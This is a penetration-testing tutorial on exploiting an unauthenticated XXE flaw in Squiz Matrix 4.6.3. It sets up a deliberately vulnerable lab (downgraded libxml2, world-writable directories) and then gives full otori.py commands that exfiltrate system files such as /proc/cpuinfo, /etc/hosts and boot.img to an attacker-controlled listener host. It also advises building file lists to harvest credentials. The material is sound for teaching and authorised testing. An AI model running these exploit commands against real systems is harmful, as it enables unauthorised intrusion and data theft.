[ Beneath the Waves ]

OTORI - Example 2: Squiz Matrix

article by Ben Lincoln

 

This article describes security testing-related software whose use may be restricted or prohibited in your place of residence or your workplace. The penalties for violating laws and regulations regarding security testing-related tools can be severe. Ensuring that you are allowed to use this software is your responsibility.

The instructions in this tutorial are slightly less-detailed than for other articles on this website. This is because the software described should not be used if you are unfamiliar with basic- to intermediate-level use of Linux. Proceeding without having that knowledge is very likely to result in damage and/or loss of data.

Squiz Matrix is one of many open-source content-management systems available today. According to its creators, its focus is on people who work in marketing.

From an XXE perspective, Squiz Matrix is interesting because the vulnerable version does not require authentication to misuse, and as a PHP-based application, can be used to retrieve binary content (although the filesize is limited to about 2KiB unless it was built in an unusual way).

Taking advantage of Squiz Matrix requires the use of the type of techniques described by Timur Yunusov and Alexey Osipov at Black Hat EU 2013[1].

Important: Squiz Matrix becomes invulnerable to the modules described below if the system-level libxml2 library is too new. The change appears to have been made in early June of 2014 in the Ubuntu release of libxml2, which is noted as being intended to address CVE-2014-0191. The instructions below include a step to downgrade the library in question. If you find an instance which is not vulnerable in a real pen-test, the underlying OS has probably had its libraries patched.

Test Environment Systems

You'll need 2-3 systems for this exercise:

  1. The attacker/pen-testing system. This is where On The Outside, Reaching In will run. This tutorial was written and tested using a vanilla Debian 7 x64 VM, as well as a Kali Linux 1.0 x64 VM for this role. Both were patched at the current level when this document was written.
  2. The system where She Wore A Mirrored Mask will run. This can be the same as the first system, or you can use a separate system to simulate running She Wore A Mirrored Mask on a previously-compromised system on the target network. This tutorial was written and tested with the first two roles being held by the same system.
  3. The target system. This tutorial was written and tested using Ubuntu 12.04 x64 for this role.

I strongly recommend that you build VMs specifically for this testing, or at least snapshot existing VMs before you begin, so that if something goes wrong, you won't lose any data/work. This software is a pre-alpha preview of a tool designed for penetration testing (in other words, it actively misuses its target(s)). Take appropriate safety precautions.

Test Environment Setup

Setting up the attacking system is easy — just unpack the current release of On The Outside, Reaching In. If you are running She Wore A Mirrored Mask on a separate system, you'll want to unpack that too.

The target system will take more effort — Squiz Matrix is a bit of a chore to set up. The following instructions should get you up and running if you're using Ubuntu 12.04 x64 as the base OS. Any other OS will result in you pretty much being on your own, due to the large number of dependencies required. I really recommend that you build an Ubuntu 12.0.4 VM specifically to install Squiz Matrix on — there are a number of aspects to the configuration that will make it difficult to host anything else on it.

Screenshots of key steps are below the list of instructions.

  1. Edit your /etc/hosts files (or your DNS server configuration) to add at least one entry which maps a distinct FQDN (e.g. squiztarget.vuln.local) to a non-loopback address for your target server. You will need to do this on both your target system and your attacking system. Squiz Matrix will fail to install correctly if this is not done on the target system, and it will not honour requests from the attacking system unless they include the same name in the HTTP Host header. The installation will also fail if you use the loopback address (127.0.0.1) for these entries instead of a network-accessible IP.
  2. Install any missing OS-level prerequisites using the following command:

     

    sudo apt-get install autoconf automake bison build-essential cvs flex gcc g++ libtool m4 make wget postgresql apache2-mpm-prefork php5 libapache2-mod-php5 php5-gd php5-pgsql php-pear

  3. Install any missing PHP prerequisites using the following command:

     

    sudo pear install Auth_SASL DB Archive_Tar Mail Mail_Mime Mail_mimeDecode Mail_Queue XML_HTMLSax XML_Parser XML_RPC XML_Tree Text_Diff HTTP HTTP_Request HTTP_Client Net_URL Image_Graph-0.7.2 Image_Color Image_Canvas-0.3.1 Math_Stats-0.8.5 Net_SMTP Net_Socket Numbers_Roman Numbers_Words-0.16.4 I18N_UnicodeNormalizer Services_JSON MDB2 pear/MDB2#pgsql

  4. Downgrade to a version of libxml2 which causes Squiz Matrix to still be vulnerable:

     

    sudo apt-get install libxml2=2.7.8.dfsg-5.1ubuntu4

    (I know that versions as recent as 2.7.8.dfsg-5.1ubuntu4.6 are vulnerable, but they're not in the standard repository).
  5. Download the Squiz Matrix checkout script using the following commands:

     

    wget "http://public-cvs.squiz.net/cgi-bin/viewcvs.cgi/*checkout*/mysource_matrix/scripts/dev/checkout.sh"

    chmod +x checkout.sh

  6. Use the checkout script to obtain version 4.6.3 (the last version vulnerable to the methods described below):

     

    ./checkout.sh mysource_4-6-3 "squiz_matrix_4.6.3"

    (note: you will get a few errors indicating "no such tag mysource_4-6-3" — this is because those components did not exist when 4.6.3 was released.
  7. Optionally, create an archive of this version in case the CVS repository is deleted in the future:

     

    tar -cjvf "squiz_matrix_4.6.3.tar.bz2" squiz_matrix_4.6.3

  8. Switch context to the PostgreSQL user:

     

    sudo su

    su postgres

  9. Create the two Squiz Matrix database users:

     

    createuser -SRDU postgres matrix

    createuser -SRDU postgres matrix_secondary

    Note that these commands will create these users with empty passwords. This is very bad, but it is word-for-word from the official Squiz Matrix installation guide. We'll be fixing that shortly.
  10. Create the Squiz Matrix database and add support for the PLPGSQL language to it:

     

    createdb -U postgres -O matrix -E UTF8 squiz_matrix

    createlang -U postgres plpgsql squiz_matrix

  11. If you are using PostgreSQL 9.0 or higher (you probably are, but can review the apt-get output from previous steps to verify this), enter the following sequence of commands to launch the psql CLI, enable a special flag, and set the password for the two PostgreSQL users you created previously. Of course, you should use different passwords:

     

    psql

    ALTER DATABASE squiz_matrix SET bytea_output TO 'escape';

    ALTER USER matrix WITH PASSWORD '2737ae7431508912302bf3513c0189bf';

    ALTER USER matrix_secondary WITH PASSWORD '6152d75ceb00a4f82368fc8fdaa41618';

    \q

  12. Execute the exit command twice to leave the context of the postgres and root accounts:

     

    exit

    exit

  13. cd into the directory where you downloaded the Squiz Matrix files (e.g. ~/squiz_matrix_4.6.3 if you followed the commands above exactly).
  14. Execute the following command to perform the first step of the installation. Be sure to replace the path with the actual path where you unpacked the files!

     

    php install/step_01.php /home/squiz/squiz_matrix_4.6.3

  15. Edit the file data/private/conf/main.inc using your favourite text-editor.
    1. Locate the SQ_CONF_SYSTEM_ROOT_URLS definition and update it to include the FQDN you set up in your /etc/hosts file (or DNS server).
    2. Locate the SQ_CONF_DEFAULT_EMAIL definition and update it to include an email address at the FQDN you set up in your /etc/hosts file (or DNS server). I used squiz@squiztarget.vuln.local.
    3. Locate the SQ_CONF_TECH_EMAIL definition and update it to include an email address at the FQDN you set up in your /etc/hosts file (or DNS server). I used squiz@squiztarget.vuln.local.
    Save the file and exit.
  16. Edit the file data/private/conf/db.inc using your favourite text-editor.
    1. For all three entries, specify pgsql:dbname=squiz_matrix; host=localhost for the DSN.
    2. For all three entries, specify pgsql for the type.
    3. For the first and second entries, specify matrix for the user.
    4. For the third entry, specify matrix_secondary for the user.
    5. Specify the corresponding passwords that you set previously for those two users.
    Save the file and exit.
  17. Execute the following command to perform the second step of the installation. Be sure to replace the path with the actual path where you unpacked the files!

     

    php install/step_02.php /home/squiz/squiz_matrix_4.6.3

  18. Execute the following commands to perform the next steps of the installation. Be sure to replace the path with the actual path where you unpacked the files!

     

    php install/compile_locale.php /home/squiz/squiz_matrix_4.6.3

    php install/step_03.php /home/squiz/squiz_matrix_4.6.3

    php install/compile_locale.php /home/squiz/squiz_matrix_4.6.3

  19. Execute the following commands to make your Squiz Matrix installation pretty insecure, but in the process give the Apache user the write access it needs:

     

    chmod --recursive o+w cache

    chmod --recursive o+w data

  20. Edit your Apache httpd site configuration using your favourite text-editor. If you have been following these instructions exactly, this will be the file /etc/apache2/sites-enabled/000-default. You can refer to the screenshots at the end of this section for guidance. You will want to paste in the following content, replacing all occurrences of /home/squiz/squiz_matrix_4.6.3 with the actual installation directory you put Squiz Matrix in, and replacing squiztarget.vuln.local with the appropriate FQDN if you used something else.

     

    <VirtualHost *:80>

    ServerName squiztarget.vuln.local

    ServerAdmin webmaster@localhost

    DocumentRoot /home/squiz/squiz_matrix_4.6.3/core/web

    Options -Indexes FollowSymLinks

    <Directory /home/squiz/squiz_matrix_4.6.3>

    Order deny,allow

    Deny from all

    </Directory>

    <DirectoryMatch "^/home/squiz/squiz_matrix_4.6.3/(core/(web|lib)|data/public|fudge)">

    Order allow,deny

    Allow from all

    </DirectoryMatch>

    <DirectoryMatch "^/home/squiz/squiz_matrix_4.6.3/data/public/assets">

    SetHandler default-handler

    </DirectoryMatch>

    <FilesMatch "\.inc$">

    Order allow,deny

    Deny from all

    </FilesMatch>

    <LocationMatch "/(CVS|\.FFV)/">

    Order allow,deny

    Deny from all

    </LocationMatch>

    Alias /__fudge /home/squiz/squiz_matrix_4.6.3/fudge

    Alias /__data /home/squiz/squiz_matrix_4.6.3/data/public

    Alias /__lib /home/squiz/squiz_matrix_4.6.3/core/lib

    Alias / /home/squiz/squiz_matrix_4.6.3/core/web/index.php/

    </VirtualHost>

  21. Save the file and exit.
  22. Restart Apache httpd, e.g.:

     

    sudo /etc/init.d/apache2 restart

  23. Attempt to access the Squiz Matrix web interface using your browser. For example, if you have followed the steps above exactly, then the URL would be http://squiztarget.vuln.local/. If the installation was successful, you should see a brief "MySource Notice" error (no, really).
  24. Assuming you were successful in installing the software, proceed to the web admin interface (the base URL with _admin/ appended, e.g. http://squiztarget.vuln.local/_admin/.
  25. If the page loads correctly, you can log in with username root and password root. Full use of the Squiz Matrix web interface requires that you have a Java plugin for your browser. If the left pane is blank grey, it's because you don't have one. You will also likely receive some annoying nag popups regarding your non-ancient JRE version and that you need to allow popups for the admin interface to work.
  26. Even though this is a training environment, you should change the password for the root user:
    1. In the left pane, click the My Space tab.
    2. Click the My Details link.
    3. Click the Acquire Lock(s) button.
    4. Enter the new root user password in both of the text boxes, then click the Commit button at the bottom of the page.

Yay! You're done! Unless you got some errors, in which case you'll need to do some web searches.

Test Environment Setup - Screenshots
[ Squiz Matrix main.inc file ]
Squiz Matrix main.inc file
[ Squiz Matrix db.inc file ]
Squiz Matrix db.inc file
[ A sign that the installation has succeeded ]
A sign that the installation has succeeded
[ Squiz Matrix admin logon page ]
Squiz Matrix admin logon page
[ Squiz Matrix admin interface (no Java plugin) ]
Squiz Matrix admin interface (no Java plugin)
[ Squiz Matrix admin interface (with Java plugin) ]
Squiz Matrix admin interface (with Java plugin)
[ You'll get to know this warning very well ]
You'll get to know this warning very well
[ ...as well as this one ]
...as well as this one
[ Navigating to the password change section (1/2) ]
Navigating to the password change section (1/2)
[ Navigating to the password change section (2/2) ]
Navigating to the password change section (2/2)

Illustrations related to the preceeding section.

 

Preparing to Exploit Squiz Matrix

In contrast to the ordeal of setting up the simulated target system, exploiting Squiz Matrix 4.6.3 is ridiculously easy when using On The Outside, Reaching In. All you need to know in order to proceed to the next section is the web administration URL for the target Squiz Matrix instance. For example, if you followed the steps in the previous section exactly, that would be http://squiztarget.vuln.local/_admin/.

That's right - you don't even need a web browser — let alone an intercepting proxy — if you know the URL in question.

SOS-12-007-YU-OOB - Fully Out-Of-Band Data Exfiltration Module

SOS-12-007-YU-OOB is the most effective of the three Squiz Matrix-related modules, so if you only read one section of this tutorial, it should be this one.

For purposes of this tutorial, assume that swamm.vuln.local is the machine name for the attacking system running She Wore A Mirrored Mask. If you are using a different name, or an IP address, substitute that as necessary. The name or IP you use must be defined and accessible to the target system as well as the attacking system. That is, if you have defined swamm.vuln.local in the /etc/hosts file on your attacking system, you must also define it in the /etc/hosts file on the simulated target system.

  1. cd into the directory where you unpacked She Wore A Mirrored Mask and launch it:

     

    python ./swamm.py

  2. When executed with no additional parameters, She Wore A Mirrored Mask will default to the following options:
    • Listen on port 8080 on all interfaces.
    • Use unencrypted HTTP (no TLS/SSL).
    • Pretend to be an instance of Apache Coyote 1.1.
    All three of these options can be customized - see OTORI - Instructions.
  3. In addition, seven options are randomly generated. These are the special URI stems which expose the hidden functionality of She Wore A Mirrored Mask. You will need to make a note of these in order to pass them to On The Outside, Reaching In. I have noted the values that were generated while writing this tutorial — you will need to replace those as necessary in the commands that you execute with the values generated when you launched She Wore A Mirrored Mask. It is possible to force the use of specific values for these parameters if you have a good reason to do so (see OTORI - Instructions).
    When I wrote this tutorial, the values generated for my She Wore A Mirrored Mask instance were:
    1. Base prefix: /CBt/
    2. Read prefix: /CBt/3lh/
    3. Write prefix: /CBt/moc/
    4. Append prefix: /CBt/n4Y/
    5. Delete prefix: /CBt/Qyv/
    6. Stored pair add prefix: /CBt/BmF/
    7. Stored pair delete prefix: /CBt/hpB/
  4. Verify that you have all of the parameters correct by obtaining the /proc/cpuinfo file from the Squiz Matrix server. You will call On The Outside, Reaching In with the URI for that file, the web administration URL for Squiz Matrix as the only module argument, and all of the She Wore A Mirrored Mask URLs. The She Wore A Mirrored Mask URLs must be provided as the full URL. This is to allow maximum flexibility in case the attacking system and the target system use different names for the server where She Wore A Mirrored Mask is running.

     

    python ./otori.py --clone --module "SOS-12-007-YU-OOB" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///proc/cpuinfo" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"

  5. If this works, then take advantage of the fact that Squiz Matrix is PHP-based by exfiltrating a binary file instead of a text file. How about /boot/grub/boot.img?

     

    python ./otori.py --clone --module "SOS-12-007-YU-OOB" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///boot/grub/boot.img" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"

  6. Unlike Java-based applications, PHP will not allow directory listings to be retrieved. However, On The Outside, Reaching In supports reading a list of URIs from a file, and includes a number of such files in the lists directory. For example, to retrieve a number of potential files which would be useful for "footprinting" — or even compromising — a target system:

    python ./otori.py --clone --module "SOS-12-007-YU-OOB" --module-options "http://squiztarget.vuln.local/_admin/" --exacturilist "lists/linux-system_information.txt" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"

In many cases, you will need to obtain further information about the system and use that to construct targeted lists. For example, perhaps there is a web interface to another component on the system which tells you that its base installation directory is /opt/some_server_18.2.3/. You could download the installer for that software to a test VM, unpack it, and figure out what its interesting contents might be (e.g. conf/database_connection_string.xml), and then map that relative path onto the known base path for the real target server.

SOS-12-007-YU-OOB - Screenshots
[ SWAMM startup ]
SWAMM startup
[ /proc/cpuinfo exfiltrated ]
/proc/cpuinfo exfiltrated
[ /boot/grub/boot.img exfiltrated ]
/boot/grub/boot.img exfiltrated
[ A variety of system information from /proc and /etc ]
A variety of system information from /proc and /etc
 

Illustrations related to the preceeding section.

 

SOS-12-007-YU-404 - Reference To Nonexistent Page/Error-Reflection (Base64-Encoded) Module

This module works in virtually the same way as SOS-12-007-YU-OOB. For example, to retrieve the /etc/hosts file:

 

python ./otori.py --clone --module "SOS-12-007-YU-404" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///etc/hosts" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"

SOS-12-007-YU-IU - Reference To Invalid URI/Error-Reflection (Non-Base64-Encoded) Module

This module is included for purposes of showing the different ways that the actual vulnerability in Squiz Matrix can be exploited (for those who are interested in writing their own modules). It is not recommended for general use (partly because unlike the previous two, it cannot retrieve binary content), but uses the same syntax as SOS-12-007-YU-OOB. For example, to retrieve the /etc/hosts file:

 

python ./otori.py --clone --module "SOS-12-007-YU-IU" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///etc/hosts" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"

 
Footnotes
1. See the whitepaper by Timur Yunusov and Alexey Osipov and the slides from the corresponding BlackHat EU 2013 presentation - also by Timur Yunusov and Alexey Osipov.
2. The following versions of Pear-installed components were used when writing this tutorial:
Archive_Tar [was installed by default]
Auth_SASL DB: 1.0.6
HTTP: 1.4.1
HTTP_Client: 1.2.1
HTTP_Request: 1.4.4
I18N_UnicodeNormalizer: 1.0.0
Image_Canvas: 0.3.1
Image_Color: 1.0.4
Image_Graph: 0.7.2
Mail: 1.2.0
Mail_Mime: 1.8.9
Mail_mimeDecode: 1.5.5
Mail_Queue: 1.2.7
Math_Stats: 0.8.5
MDB2: 2.4.1
MDB2_Driver_pgsql: 1.4.1
Net_SMTP: 1.6.2
Net_Socket: 1.0.14
Net_URL: 1.0.15
Numbers_Roman: 1.0.2
Numbers_Words: 0.16.4
Services_JSON: 1.0.3
Text_Diff: 1.1.1
XML_HTMLSax: 2.1.2
XML_Parser: 1.3.4
XML_RPC: 1.5.5
XML_Tree: 1.1
 
[ Page Icon ]